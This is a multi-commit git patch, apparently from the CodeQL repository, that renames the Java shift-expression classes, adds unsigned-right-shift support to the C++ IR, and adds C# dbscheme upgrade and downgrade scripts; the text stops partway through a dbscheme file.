a/java/ql/lib/semmle/code/java/Expr.qll b/java/ql/lib/semmle/code/java/Expr.qll index a10da9ecc9f..78eda1dba8d 100644 --- a/java/ql/lib/semmle/code/java/Expr.qll +++ b/java/ql/lib/semmle/code/java/Expr.qll @@ -366,11 +366,11 @@ class CompileTimeConstantExpr extends Expr { or b instanceof SubExpr and result = v1 - v2 or - b instanceof LShiftExpr and result = v1.bitShiftLeft(v2) + b instanceof LeftShiftExpr and result = v1.bitShiftLeft(v2) or - b instanceof RShiftExpr and result = v1.bitShiftRightSigned(v2) + b instanceof RightShiftExpr and result = v1.bitShiftRightSigned(v2) or - b instanceof URShiftExpr and result = v1.bitShiftRight(v2) + b instanceof UnsignedRightShiftExpr and result = v1.bitShiftRight(v2) or b instanceof AndBitwiseExpr and result = v1.bitAnd(v2) or @@ -623,26 +623,35 @@ class AssignXorExpr extends AssignOp, @assignxorexpr { } /** A compound assignment expression using the `<<=` operator. */ -class AssignLShiftExpr extends AssignOp, @assignlshiftexpr { +class AssignLeftShiftExpr extends AssignOp, @assignlshiftexpr { override string getOp() { result = "<<=" } - override string getAPrimaryQlClass() { result = "AssignLShiftExpr" } + override string getAPrimaryQlClass() { result = "AssignLeftShiftExpr" } } +/** DEPRECATED: Alias for AssignLeftShiftExpr. */ +deprecated class AssignLShiftExpr = AssignLeftShiftExpr; + /** A compound assignment expression using the `>>=` operator. */ -class AssignRShiftExpr extends AssignOp, @assignrshiftexpr { +class AssignRightShiftExpr extends AssignOp, @assignrshiftexpr { override string getOp() { result = ">>=" } - override string getAPrimaryQlClass() { result = "AssignRShiftExpr" } + override string getAPrimaryQlClass() { result = "AssignRightShiftExpr" } } +/** DEPRECATED: Alias for AssignRightShiftExpr. */ +deprecated class AssignRShiftExpr = AssignRightShiftExpr; + /** A compound assignment expression using the `>>>=` operator. */ -class AssignURShiftExpr extends AssignOp, @assignurshiftexpr { +class AssignUnsignedRightShiftExpr extends AssignOp, @assignurshiftexpr { override string getOp() { result = ">>>=" } - override string getAPrimaryQlClass() { result = "AssignURShiftExpr" } + override string getAPrimaryQlClass() { result = "AssignUnsignedRightShiftExpr" } } +/** DEPRECATED: Alias for AssignUnsignedRightShiftExpr. */ +deprecated class AssignURShiftExpr = AssignUnsignedRightShiftExpr; + /** A common super-class to represent constant literals. */ class Literal extends Expr, @literal { /** @@ -904,26 +913,35 @@ class SubExpr extends BinaryExpr, @subexpr { } /** A binary expression using the `<<` operator. */ -class LShiftExpr extends BinaryExpr, @lshiftexpr { +class LeftShiftExpr extends BinaryExpr, @lshiftexpr { override string getOp() { result = " << " } - override string getAPrimaryQlClass() { result = "LShiftExpr" } + override string getAPrimaryQlClass() { result = "LeftShiftExpr" } } +/** DEPRECATED: Alias for LeftShiftExpr. */ +deprecated class LShiftExpr = LeftShiftExpr; + /** A binary expression using the `>>` operator. */ -class RShiftExpr extends BinaryExpr, @rshiftexpr { +class RightShiftExpr extends BinaryExpr, @rshiftexpr { override string getOp() { result = " >> " } - override string getAPrimaryQlClass() { result = "RShiftExpr" } + override string getAPrimaryQlClass() { result = "RightShiftExpr" } } +/** DEPRECATED: Alias for RightShiftExpr. */ +deprecated class RShiftExpr = RightShiftExpr; + /** A binary expression using the `>>>` operator. */ -class URShiftExpr extends BinaryExpr, @urshiftexpr { +class UnsignedRightShiftExpr extends BinaryExpr, @urshiftexpr { override string getOp() { result = " >>> " } - override string getAPrimaryQlClass() { result = "URShiftExpr" } + override string getAPrimaryQlClass() { result = "UnsignedRightShiftExpr" } } +/** DEPRECATED: Alias for UnsignedRightShiftExpr. */ +deprecated class URShiftExpr = UnsignedRightShiftExpr; + /** A binary expression using the `&` operator. */ class AndBitwiseExpr extends BinaryExpr, @andbitexpr { override string getOp() { result = " & " } diff --git a/java/ql/lib/semmle/code/java/dataflow/ModulusAnalysis.qll b/java/ql/lib/semmle/code/java/dataflow/ModulusAnalysis.qll index b919d143a39..5b2a39ad6c9 100644 --- a/java/ql/lib/semmle/code/java/dataflow/ModulusAnalysis.qll +++ b/java/ql/lib/semmle/code/java/dataflow/ModulusAnalysis.qll @@ -105,7 +105,7 @@ private predicate evenlyDivisibleExpr(Expr e, int factor) { exists(ConstantIntegerExpr c, int k | k = c.getIntValue() | e.(MulExpr).getAnOperand() = c and factor = k.abs() and factor >= 2 or - e.(LShiftExpr).getRhs() = c and factor = 2.pow(k) and k > 0 + e.(LeftShiftExpr).getRhs() = c and factor = 2.pow(k) and k > 0 or e.(BitwiseAndExpr).getAnOperand() = c and factor = max(int f | andmaskFactor(k, f)) ) diff --git a/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll b/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll index 835c4a20ac3..aeb79ee99e1 100644 --- a/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll +++ b/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll @@ -528,11 +528,11 @@ private predicate boundFlowStepMul(Expr e2, Expr e1, int factor) { or exists(AssignMulExpr e | e = e2 and e.getDest() = c and e.getRhs() = e1 and factor = k) or - exists(LShiftExpr e | + exists(LeftShiftExpr e | e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) ) or - exists(AssignLShiftExpr e | + exists(AssignLeftShiftExpr e | e = e2 and e.getDest() = e1 and e.getRhs() = c and factor = 2.pow(k) ) ) @@ -552,19 +552,19 @@ private predicate boundFlowStepDiv(Expr e2, Expr e1, int factor) { or exists(AssignDivExpr e | e = e2 and e.getDest() = e1 and e.getRhs() = c and factor = k) or - exists(RShiftExpr e | + exists(RightShiftExpr e | e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) ) or - exists(AssignRShiftExpr e | + exists(AssignRightShiftExpr e | e = e2 and e.getDest() = e1 and e.getRhs() = c and factor = 2.pow(k) ) or - exists(URShiftExpr e | + exists(UnsignedRightShiftExpr e | e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) ) or - exists(AssignURShiftExpr e | + exists(AssignUnsignedRightShiftExpr e | e = e2 and e.getDest() = e1 and e.getRhs() = c and factor = 2.pow(k) ) ) diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll index c5d5bc98009..7e13861c0da 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll @@ -72,13 +72,13 @@ module Private { } /** A left shift or an assign-lshift expression. */ - class LShiftExpr extends J::Expr { - LShiftExpr() { this instanceof J::LShiftExpr or this instanceof J::AssignLShiftExpr } + class LeftShiftExpr extends J::Expr { + LeftShiftExpr() { this instanceof J::LeftShiftExpr or this instanceof J::AssignLeftShiftExpr } /** Gets the RHS operand of this shift. */ Expr getRhs() { - result = this.(J::LShiftExpr).getRightOperand() or - result = this.(J::AssignLShiftExpr).getRhs() + result = this.(J::LeftShiftExpr).getRightOperand() or + result = this.(J::AssignLeftShiftExpr).getRhs() } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/Sign.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/Sign.qll index b2058a27114..649b4216996 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/Sign.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/Sign.qll @@ -18,9 +18,9 @@ newtype TBinarySignOperation = TBitAndOp() or TBitOrOp() or TBitXorOp() or - TLShiftOp() or - TRShiftOp() or - TURShiftOp() + TLeftShiftOp() or + TRightShiftOp() or + TUnsignedRightShiftOp() /** Class representing expression signs (+, -, 0). */ class Sign extends TSign { @@ -271,10 +271,10 @@ class Sign extends TSign { or op = TBitXorOp() and result = bitxor(s) or - op = TLShiftOp() and result = lshift(s) + op = TLeftShiftOp() and result = lshift(s) or - op = TRShiftOp() and result = rshift(s) + op = TRightShiftOp() and result = rshift(s) or - op = TURShiftOp() and result = urshift(s) + op = TUnsignedRightShiftOp() and result = urshift(s) } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll index b2b63ff3633..59f7f4580a8 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll @@ -102,12 +102,12 @@ module Private { this instanceof J::AssignOrExpr or this instanceof J::XorBitwiseExpr or this instanceof J::AssignXorExpr or - this instanceof J::LShiftExpr or - this instanceof J::AssignLShiftExpr or - this instanceof J::RShiftExpr or - this instanceof J::AssignRShiftExpr or - this instanceof J::URShiftExpr or - this instanceof J::AssignURShiftExpr + this instanceof J::LeftShiftExpr or + this instanceof J::AssignLeftShiftExpr or + this instanceof J::RightShiftExpr or + this instanceof J::AssignRightShiftExpr or + this instanceof J::UnsignedRightShiftExpr or + this instanceof J::AssignUnsignedRightShiftExpr } /** Returns the operation representing this expression. */ @@ -144,17 +144,17 @@ module Private { or this instanceof J::AssignXorExpr and result = TBitXorOp() or - this instanceof J::LShiftExpr and result = TLShiftOp() + this instanceof J::LeftShiftExpr and result = TLeftShiftOp() or - this instanceof J::AssignLShiftExpr and result = TLShiftOp() + this instanceof J::AssignLeftShiftExpr and result = TLeftShiftOp() or - this instanceof J::RShiftExpr and result = TRShiftOp() + this instanceof J::RightShiftExpr and result = TRightShiftOp() or - this instanceof J::AssignRShiftExpr and result = TRShiftOp() + this instanceof J::AssignRightShiftExpr and result = TRightShiftOp() or - this instanceof J::URShiftExpr and result = TURShiftOp() + this instanceof J::UnsignedRightShiftExpr and result = TUnsignedRightShiftOp() or - this instanceof J::AssignURShiftExpr and result = TURShiftOp() + this instanceof J::AssignUnsignedRightShiftExpr and result = TUnsignedRightShiftOp() } Expr getLeftOperand() { diff --git a/java/ql/src/Likely Bugs/Arithmetic/LShiftLargerThanTypeWidth.ql b/java/ql/src/Likely Bugs/Arithmetic/LShiftLargerThanTypeWidth.ql index 92bec98fd5e..f3c0b220080 100644 --- a/java/ql/src/Likely Bugs/Arithmetic/LShiftLargerThanTypeWidth.ql +++ b/java/ql/src/Likely Bugs/Arithmetic/LShiftLargerThanTypeWidth.ql @@ -14,7 +14,7 @@ int integralTypeWidth(IntegralType t) { if t.hasName("long") or t.hasName("Long") then result = 64 else result = 32 } -from LShiftExpr shift, IntegralType t, int v, string typname, int width +from LeftShiftExpr shift, IntegralType t, int v, string typname, int width where shift.getLeftOperand().getType() = t and shift.getRightOperand().(CompileTimeConstantExpr).getIntValue() = v and diff --git a/java/ql/src/Likely Bugs/Arithmetic/WhitespaceContradictsPrecedence.ql b/java/ql/src/Likely Bugs/Arithmetic/WhitespaceContradictsPrecedence.ql index db806ef760c..b0508b8eb38 100644 --- a/java/ql/src/Likely Bugs/Arithmetic/WhitespaceContradictsPrecedence.ql +++ b/java/ql/src/Likely Bugs/Arithmetic/WhitespaceContradictsPrecedence.ql @@ -33,9 +33,9 @@ class ArithmeticExpr extends BinaryExpr { */ class ShiftExpr extends BinaryExpr { ShiftExpr() { - this instanceof LShiftExpr or - this instanceof RShiftExpr or - this instanceof URShiftExpr + this instanceof LeftShiftExpr or + this instanceof RightShiftExpr or + this instanceof UnsignedRightShiftExpr } } diff --git a/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.ql b/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.ql index 964a5a6060a..b4076bee00b 100644 --- a/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.ql +++ b/java/ql/src/Likely Bugs/Comparison/UselessComparisonTest.ql @@ -99,7 +99,7 @@ Expr overFlowCand() { | bin instanceof AddExpr or bin instanceof MulExpr or - bin instanceof LShiftExpr + bin instanceof LeftShiftExpr ) or exists(AssignOp op | @@ -109,7 +109,7 @@ Expr overFlowCand() { | op instanceof AssignAddExpr or op instanceof AssignMulExpr or - op instanceof AssignLShiftExpr + op instanceof AssignLeftShiftExpr ) or exists(AddExpr add, CompileTimeConstantExpr c | diff --git a/java/ql/src/Security/CWE/CWE-190/ArithmeticCommon.qll b/java/ql/src/Security/CWE/CWE-190/ArithmeticCommon.qll index 8287ebc869e..122f6b75b4a 100644 --- a/java/ql/src/Security/CWE/CWE-190/ArithmeticCommon.qll +++ b/java/ql/src/Security/CWE/CWE-190/ArithmeticCommon.qll @@ -153,9 +153,9 @@ predicate upcastToWiderType(Expr e) { /** Holds if the result of `exp` has certain bits filtered by a bitwise and. */ private predicate inBitwiseAnd(Expr exp) { exists(AndBitwiseExpr a | a.getAnOperand() = exp) or - inBitwiseAnd(exp.(LShiftExpr).getAnOperand()) or - inBitwiseAnd(exp.(RShiftExpr).getAnOperand()) or - inBitwiseAnd(exp.(URShiftExpr).getAnOperand()) + inBitwiseAnd(exp.(LeftShiftExpr).getAnOperand()) or + inBitwiseAnd(exp.(RightShiftExpr).getAnOperand()) or + inBitwiseAnd(exp.(UnsignedRightShiftExpr).getAnOperand()) } /** Holds if overflow/underflow is irrelevant for this expression. */ diff --git a/java/ql/src/Security/CWE/CWE-681/NumericCastCommon.qll b/java/ql/src/Security/CWE/CWE-681/NumericCastCommon.qll index 4dec14a204f..5a77c0a8d6e 100644 --- a/java/ql/src/Security/CWE/CWE-681/NumericCastCommon.qll +++ b/java/ql/src/Security/CWE/CWE-681/NumericCastCommon.qll @@ -16,10 +16,10 @@ class NumericNarrowingCastExpr extends CastExpr { class RightShiftOp extends Expr { RightShiftOp() { - this instanceof RShiftExpr or - this instanceof URShiftExpr or - this instanceof AssignRShiftExpr or - this instanceof AssignURShiftExpr + this instanceof RightShiftExpr or + this instanceof UnsignedRightShiftExpr or + this instanceof AssignRightShiftExpr or + this instanceof AssignUnsignedRightShiftExpr } private Expr getLhs() { diff --git a/java/ql/test/kotlin/library-tests/exprs/PrintAst.expected b/java/ql/test/kotlin/library-tests/exprs/PrintAst.expected index 78bf583ec0d..3b4cc35d4d4 100644 --- a/java/ql/test/kotlin/library-tests/exprs/PrintAst.expected +++ b/java/ql/test/kotlin/library-tests/exprs/PrintAst.expected @@ -1944,17 +1944,17 @@ exprs.kt: # 15| 1: [VarAccess] y # 16| 5: [LocalVariableDeclStmt] var ...; # 16| 1: [LocalVariableDeclExpr] i6 -# 16| 0: [LShiftExpr] ... << ... +# 16| 0: [LeftShiftExpr] ... << ... # 16| 0: [VarAccess] x # 16| 1: [VarAccess] y # 17| 6: [LocalVariableDeclStmt] var ...; # 17| 1: [LocalVariableDeclExpr] i7 -# 17| 0: [RShiftExpr] ... >> ... +# 17| 0: [RightShiftExpr] ... >> ... # 17| 0: [VarAccess] x # 17| 1: [VarAccess] y # 18| 7: [LocalVariableDeclStmt] var ...; # 18| 1: [LocalVariableDeclExpr] i8 -# 18| 0: [URShiftExpr] ... >>> ... +# 18| 0: [UnsignedRightShiftExpr] ... >>> ... # 18| 0: [VarAccess] x # 18| 1: [VarAccess] y # 19| 8: [LocalVariableDeclStmt] var ...; @@ -2236,17 +2236,17 @@ exprs.kt: # 72| 1: [VarAccess] ly # 73| 59: [LocalVariableDeclStmt] var ...; # 73| 1: [LocalVariableDeclExpr] l6 -# 73| 0: [LShiftExpr] ... << ... +# 73| 0: [LeftShiftExpr] ... << ... # 73| 0: [VarAccess] lx # 73| 1: [VarAccess] y # 74| 60: [LocalVariableDeclStmt] var ...; # 74| 1: [LocalVariableDeclExpr] l7 -# 74| 0: [RShiftExpr] ... >> ... +# 74| 0: [RightShiftExpr] ... >> ... # 74| 0: [VarAccess] lx # 74| 1: [VarAccess] y # 75| 61: [LocalVariableDeclStmt] var ...; # 75| 1: [LocalVariableDeclExpr] l8 -# 75| 0: [URShiftExpr] ... >>> ... +# 75| 0: [UnsignedRightShiftExpr] ... >>> ... # 75| 0: [VarAccess] lx # 75| 1: [VarAccess] y # 76| 62: [LocalVariableDeclStmt] var ...; diff --git a/java/ql/test/kotlin/library-tests/exprs/exprs.expected b/java/ql/test/kotlin/library-tests/exprs/exprs.expected index 5d35293eb22..07d57c444e4 100644 --- a/java/ql/test/kotlin/library-tests/exprs/exprs.expected +++ b/java/ql/test/kotlin/library-tests/exprs/exprs.expected @@ -924,15 +924,15 @@ | exprs.kt:15:18:15:18 | y | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:16:9:16:10 | i6 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:16:14:16:14 | x | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | -| exprs.kt:16:14:16:20 | ... << ... | exprs.kt:4:1:142:1 | topLevelMethod | LShiftExpr | +| exprs.kt:16:14:16:20 | ... << ... | exprs.kt:4:1:142:1 | topLevelMethod | LeftShiftExpr | | exprs.kt:16:20:16:20 | y | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:17:9:17:10 | i7 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:17:14:17:14 | x | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | -| exprs.kt:17:14:17:20 | ... >> ... | exprs.kt:4:1:142:1 | topLevelMethod | RShiftExpr | +| exprs.kt:17:14:17:20 | ... >> ... | exprs.kt:4:1:142:1 | topLevelMethod | RightShiftExpr | | exprs.kt:17:20:17:20 | y | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:18:9:18:10 | i8 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:18:14:18:14 | x | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | -| exprs.kt:18:14:18:21 | ... >>> ... | exprs.kt:4:1:142:1 | topLevelMethod | URShiftExpr | +| exprs.kt:18:14:18:21 | ... >>> ... | exprs.kt:4:1:142:1 | topLevelMethod | UnsignedRightShiftExpr | | exprs.kt:18:21:18:21 | y | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:19:9:19:10 | i9 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:19:14:19:14 | x | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | @@ -1162,15 +1162,15 @@ | exprs.kt:72:19:72:20 | ly | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:73:9:73:10 | l6 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:73:14:73:15 | lx | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | -| exprs.kt:73:14:73:21 | ... << ... | exprs.kt:4:1:142:1 | topLevelMethod | LShiftExpr | +| exprs.kt:73:14:73:21 | ... << ... | exprs.kt:4:1:142:1 | topLevelMethod | LeftShiftExpr | | exprs.kt:73:21:73:21 | y | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:74:9:74:10 | l7 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:74:14:74:15 | lx | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | -| exprs.kt:74:14:74:21 | ... >> ... | exprs.kt:4:1:142:1 | topLevelMethod | RShiftExpr | +| exprs.kt:74:14:74:21 | ... >> ... | exprs.kt:4:1:142:1 | topLevelMethod | RightShiftExpr | | exprs.kt:74:21:74:21 | y | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:75:9:75:10 | l8 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:75:14:75:15 | lx | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | -| exprs.kt:75:14:75:22 | ... >>> ... | exprs.kt:4:1:142:1 | topLevelMethod | URShiftExpr | +| exprs.kt:75:14:75:22 | ... >>> ... | exprs.kt:4:1:142:1 | topLevelMethod | UnsignedRightShiftExpr | | exprs.kt:75:22:75:22 | y | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | | exprs.kt:76:9:76:10 | l9 | exprs.kt:4:1:142:1 | topLevelMethod | LocalVariableDeclExpr | | exprs.kt:76:14:76:15 | lx | exprs.kt:4:1:142:1 | topLevelMethod | VarAccess | diff --git a/java/ql/test/library-tests/constants/PrintAst.expected b/java/ql/test/library-tests/constants/PrintAst.expected index 241d837ea3c..63d59f7287e 100644 --- a/java/ql/test/library-tests/constants/PrintAst.expected +++ b/java/ql/test/library-tests/constants/PrintAst.expected @@ -376,26 +376,26 @@ constants/Values.java: # 62| 43: [LocalVariableDeclStmt] var ...; # 62| 0: [TypeAccess] int # 62| 1: [LocalVariableDeclExpr] lshift -# 62| 0: [LShiftExpr] ... << ... +# 62| 0: [LeftShiftExpr] ... << ... # 62| 0: [IntegerLiteral] 21 # 62| 1: [IntegerLiteral] 2 # 63| 44: [LocalVariableDeclStmt] var ...; # 63| 0: [TypeAccess] int # 63| 1: [LocalVariableDeclExpr] lshift_parameter -# 63| 0: [LShiftExpr] ... << ... +# 63| 0: [LeftShiftExpr] ... << ... # 63| 0: [VarAccess] notConstant # 63| 1: [VarAccess] notConstant # 65| 45: [LocalVariableDeclStmt] var ...; # 65| 0: [TypeAccess] int # 65| 1: [LocalVariableDeclExpr] rshift -# 65| 0: [RShiftExpr] ... >> ... +# 65| 0: [RightShiftExpr] ... >> ... # 65| 0: [MinusExpr] -... # 65| 0: [IntegerLiteral] 1 # 65| 1: [IntegerLiteral] 2 # 66| 46: [LocalVariableDeclStmt] var ...; # 66| 0: [TypeAccess] int # 66| 1: [LocalVariableDeclExpr] urshift -# 66| 0: [URShiftExpr] ... >>> ... +# 66| 0: [UnsignedRightShiftExpr] ... >>> ... # 66| 0: [MinusExpr] -... # 66| 0: [IntegerLiteral] 1 # 66| 1: [IntegerLiteral] 1 From 529be7ef1804b4a60cbd2ace923b8769f873c6ce Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 10 Jan 2023 09:54:35 +0100 Subject: [PATCH 235/381] C++: Sync files. --- .../lib/semmle/code/cpp/ir/implementation/Opcode.qll | 10 ++++++++++ .../cpp/ir/implementation/aliased_ssa/Instruction.qll | 11 +++++++++++ .../code/cpp/ir/implementation/raw/Instruction.qll | 11 +++++++++++ .../ir/implementation/unaliased_ssa/Instruction.qll | 11 +++++++++++ 4 files changed, 43 insertions(+) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/Opcode.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/Opcode.qll index c4134d240ab..b4def7fe4ae 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/Opcode.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/Opcode.qll @@ -30,6 +30,7 @@ private newtype TOpcode = TNegate() or TShiftLeft() or TShiftRight() or + TUnsignedShiftRight() or TBitAnd() or TBitOr() or TBitXor() or @@ -652,6 +653,15 @@ module Opcode { final override string toString() { result = "ShiftRight" } } + /** + * The `Opcode` for a `UnsignedShiftRightInstruction`. + * + * See the `UnsignedShiftRightInstruction` documentation for more details. + */ + class UnsignedShiftRight extends BinaryBitwiseOpcode, TUnsignedShiftRight { + final override string toString() { result = "UnsignedShiftRight" } + } + /** * The `Opcode` for a `BitAndInstruction`. * diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/aliased_ssa/Instruction.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/aliased_ssa/Instruction.qll index 7afe954023b..0aa7c552638 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/aliased_ssa/Instruction.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/aliased_ssa/Instruction.qll @@ -1204,6 +1204,17 @@ class ShiftRightInstruction extends BinaryBitwiseInstruction { ShiftRightInstruction() { this.getOpcode() instanceof Opcode::ShiftRight } } +/** + * An instruction that shifts its left operand to the right by the number of bits specified by its + * right operand. + * + * Both operands must have an integer type. The result has the same type as the left operand. + * The leftmost bits are zero-filled. + */ +class UnsignedShiftRightInstruction extends BinaryBitwiseInstruction { + UnsignedShiftRightInstruction() { this.getOpcode() instanceof Opcode::UnsignedShiftRight } +} + /** * An instruction that performs a binary arithmetic operation involving at least one pointer * operand. diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/Instruction.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/Instruction.qll index 7afe954023b..0aa7c552638 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/Instruction.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/Instruction.qll @@ -1204,6 +1204,17 @@ class ShiftRightInstruction extends BinaryBitwiseInstruction { ShiftRightInstruction() { this.getOpcode() instanceof Opcode::ShiftRight } } +/** + * An instruction that shifts its left operand to the right by the number of bits specified by its + * right operand. + * + * Both operands must have an integer type. The result has the same type as the left operand. + * The leftmost bits are zero-filled. + */ +class UnsignedShiftRightInstruction extends BinaryBitwiseInstruction { + UnsignedShiftRightInstruction() { this.getOpcode() instanceof Opcode::UnsignedShiftRight } +} + /** * An instruction that performs a binary arithmetic operation involving at least one pointer * operand. diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/unaliased_ssa/Instruction.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/unaliased_ssa/Instruction.qll index 7afe954023b..0aa7c552638 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/unaliased_ssa/Instruction.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/unaliased_ssa/Instruction.qll @@ -1204,6 +1204,17 @@ class ShiftRightInstruction extends BinaryBitwiseInstruction { ShiftRightInstruction() { this.getOpcode() instanceof Opcode::ShiftRight } } +/** + * An instruction that shifts its left operand to the right by the number of bits specified by its + * right operand. + * + * Both operands must have an integer type. The result has the same type as the left operand. + * The leftmost bits are zero-filled. + */ +class UnsignedShiftRightInstruction extends BinaryBitwiseInstruction { + UnsignedShiftRightInstruction() { this.getOpcode() instanceof Opcode::UnsignedShiftRight } +} + /** * An instruction that performs a binary arithmetic operation involving at least one pointer * operand. From 5e89119b3d9559e1b6855d5f25994c2aa928a486 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 11 Jan 2023 15:09:00 +0100 Subject: [PATCH 236/381] C#: Add upgrade- and downgrade scripts for unsigned right shift operators. --- .../expressions.ql | 13 + .../old.dbscheme | 2069 +++++++++++++++++ .../semmlecode.csharp.dbscheme | 2067 ++++++++++++++++ .../upgrade.properties | 3 + .../old.dbscheme | 2067 ++++++++++++++++ .../semmlecode.csharp.dbscheme | 2069 +++++++++++++++++ .../upgrade.properties | 2 + 7 files changed, 8290 insertions(+) create mode 100644 csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/expressions.ql create mode 100644 csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme create mode 100644 csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme create mode 100644 csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties create mode 100644 csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/old.dbscheme create mode 100644 csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/semmlecode.csharp.dbscheme create mode 100644 csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/upgrade.properties diff --git a/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/expressions.ql b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/expressions.ql new file mode 100644 index 00000000000..6afabce797e --- /dev/null +++ b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/expressions.ql @@ -0,0 +1,13 @@ +class Expression extends @expr { + string toString() { none() } +} + +class TypeOrRef extends @type_or_ref { + string toString() { none() } +} + +from Expression e, int k, int kind, TypeOrRef t +where + expressions(e, k, t) and + if k = [133, 134] then kind = 106 else kind = k +select e, kind, t diff --git a/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme new file mode 100644 index 00000000000..d0fba103f7d --- /dev/null +++ b/csharp/downgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme @@ -0,0 +1,2069 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler 